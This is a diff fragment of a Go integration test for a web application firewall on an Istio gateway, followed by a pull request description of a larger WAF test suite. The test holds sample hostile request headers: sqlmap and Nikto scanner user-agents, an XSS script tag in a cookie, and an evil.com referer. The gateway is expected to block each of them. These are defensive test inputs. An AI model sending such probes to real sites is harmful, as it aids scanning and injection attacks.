+	s.ExpectEngineReady(ns, "engine")
+
+	s.Step("deploy backend and route")
+	s.CreateEchoBackend(ns, "echo")
+	s.CreateHTTPRoute(ns, "route", "gw", "echo")
+
+	gw := s.ProxyToGateway(ns, "gw")
+
+	s.Step("verify SQLMap user-agent is blocked")
+	gw.ExpectHeaderBlocked("/", map[string]string{
+		"User-Agent": "sqlmap/1.0",
+	})
+
+	s.Step("verify Nikto scanner is blocked")
+	gw.ExpectHeaderBlocked("/", map[string]string{
+		"User-Agent": "Mozilla/5.0 nikto",
+	})
+
+	s.Step("verify XSS in cookie is blocked")
+	gw.ExpectHeaderBlocked("/", map[string]string{
+		"Cookie": "session=<script>alert(1)</script>",
+	})
+
+	s.Step("verify malicious custom header is blocked")
+	gw.ExpectHeaderBlocked("/", map[string]string{
+		"X-Custom-Header": "this-is-an-attack",
+	})
+
+	s.Step("verify evil referer is blocked")
+	gw.ExpectHeaderBlocked("/", map[string]string{
+		"Referer": "https://evil.com/page",
+	})
+
+	s.Step("verify clean headers are allowed")
+	gw.ExpectHeaderAllowed("/", map[string]string{
+		"User-Agent":      "Mozilla/5.0 (compatible; safe browser)",
+		"Cookie":          "session=abc123",
+		"X-Custom-Header": "safe-value",
+		"Referer":         "https://good.com/page",
+	})
+}


### PR DESCRIPTION
Summary

  This PR introduces a comprehensive integration test suite covering WAF enforcement, security patterns, resilience, load testing, and resource lifecycle scenarios. The test framework has been enhanced to support reliable parallel test execution with Istio service mesh.

  New Integration Tests (22 tests)

  Isolation Tests (isolation_test.go)
  - TestCrossNamespaceIsolation - Verifies rules in namespace A don't affect namespace B

  WAF Enforcement Tests (waf_enforcement_test.go)
  - TestBlockByStatusCode - Custom HTTP status codes (403, 406, 503) for blocked requests
  - TestAllowPolicyOnFailure - Traffic allowed when WAF has missing ruleset with allow policy
  - TestRequestBodyInspection - WAF detection of SQL injection/XSS in POST body (logging mode)
  - TestRequestHeaderInspection - Malicious header detection (User-Agent, Cookie, custom headers)

  Security Pattern Tests (security_patterns_test.go)
  - TestSQLInjectionPatterns - Union-based, stacked queries, time-based blind SQLi detection
  - TestXSSPatterns - Script tags, event handlers, javascript protocol detection
  - TestPathTraversal - Directory traversal and sensitive file access blocking
  - TestCommandInjection - Shell command injection pattern detection
  - TestProtocolAttacks - CRLF, LDAP injection, SSRF, file inclusion attacks

  RuleSet Lifecycle Tests (ruleset_lifecycle_test.go)
  - TestRuleSetDeletion - Graceful handling when RuleSet deleted while Engine references it
  - TestEngineDeleteRecreate - WasmPlugin cleanup and recreation on Engine delete/recreate
  - TestConfigMapDeletion - Cached rules continue after ConfigMap deletion
  - TestRuleSetOrderMatters - ConfigMap processing order and rule precedence
  - TestEmptyRuleSet - SecRuleEngine Off allows all traffic

  Resilience Tests (resilience_test.go)
  - TestRapidRuleUpdates - 10 rapid ConfigMap updates result in correct final state
  - TestGatewayPodRestart - WAF rules re-apply after Gateway pod restart
  - TestEngineRecreateAfterGateway - Engine discovers Gateway created after Engine
  - TestConcurrentRuleSetUpdates - Multiple RuleSet updates don't cause issues

  Load Tests (load_test.go)
  - TestHighThroughput - High request volume handling
  - TestSustainedLoad - Sustained traffic over time
  - TestMixedTrafficLoad - Mixed clean and malicious traffic patterns

  Framework Enhancements

  Parallel Test Stability:
  - Extended GatewayReadyTimeout to 1200s (20min) to handle Istio CA certificate signing delays during parallel execution
  - Added staggered namespace creation (0-2s random delay) to reduce Istio CA contention

  New Test Helpers:
  - ExpectPostBlocked / ExpectPostAllowed / ExpectPostStatus - POST request assertions
  - ExpectHeaderBlocked / ExpectHeaderAllowed / ExpectHeaderStatus - Header-based request assertions
